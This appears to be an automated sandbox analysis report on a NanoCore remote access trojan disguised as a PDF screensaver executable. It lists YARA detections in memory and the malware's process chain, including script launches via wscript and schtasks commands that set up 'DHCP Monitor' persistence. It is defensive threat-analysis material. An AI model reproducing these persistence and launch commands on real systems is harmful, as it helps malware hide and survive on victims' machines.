      Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000001.00000003.359286205.00000000036B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth (Nextron Systems), description = Detects LNK file with suspicious content, score =
      Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR; Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR; Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR; Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: RegSvcs.exe PID: 5960, type: MEMORYSTR; Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: RegSvcs.exe PID: 5960, type: MEMORYSTR; Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR; Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR; Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR; Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR; Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR; Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR; Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR; Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR; Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR; Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR; Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR; Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR; Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR; Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR; Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR; Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR; Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR; Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR; Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR; Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR; Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR; Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe; Code function: 2_2_0037F122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe; Code function: String function: 00330DC0 appears 46 times
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe; Code function: String function: 0032FD60 appears 40 times
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe; Code function: String function: 00CDEC50 appears 56 times
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe; Code function: String function: 00CDEB78 appears 39 times
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe; Code function: String function: 00CDF5F0 appears 31 times
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe; Code function: 0_2_00CC6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.0000000007390000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameautoruns.exeL, vs 026910003102350.pdf.scr.exe
      Source: 026910003102350.pdf.scr.exe; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe; File created: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A
      Source: classification engine; Classification label: mal100.troj.evad.winEXE@43/44@4/2
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe; File read: C:\Windows\win.ini
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe; Code function: 0_2_00CC6C74 GetLastError,FormatMessageW,
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe; Code function: 0_2_00CDA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,
      Source: unknown; Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs"
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe; File created: C:\Program Files (x86)\DHCP Monitor
      Source: 026910003102350.pdf.scr.exe; ReversingLabs: Detection: 46%
      Source: 026910003102350.pdf.scr.exe; Virustotal: Detection: 45%
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe; File read: C:\Users\user\Desktop\026910003102350.pdf.scr.exe
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknown; Process created: C:\Users\user\Desktop\026910003102350.pdf.scr.exe C:\Users\user\Desktop\026910003102350.pdf.scr.exe
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe; Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" daitsfsh-waune.icm.vbe
      Source: C:\Windows\SysWOW64\wscript.exe; Process created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe" rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe; Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe; Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp897A.tmp
      Source: unknown; Process created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: C:\Windows\SysWOW64\schtasks.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe; Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp8D34.tmp
      Source: C:\Windows\SysWOW64\schtasks.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknown; Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknown; Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknown; Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe"
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" daitsfsh-waune.icm.vbe
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe" rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp897A.tmp
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp8D34.tmp
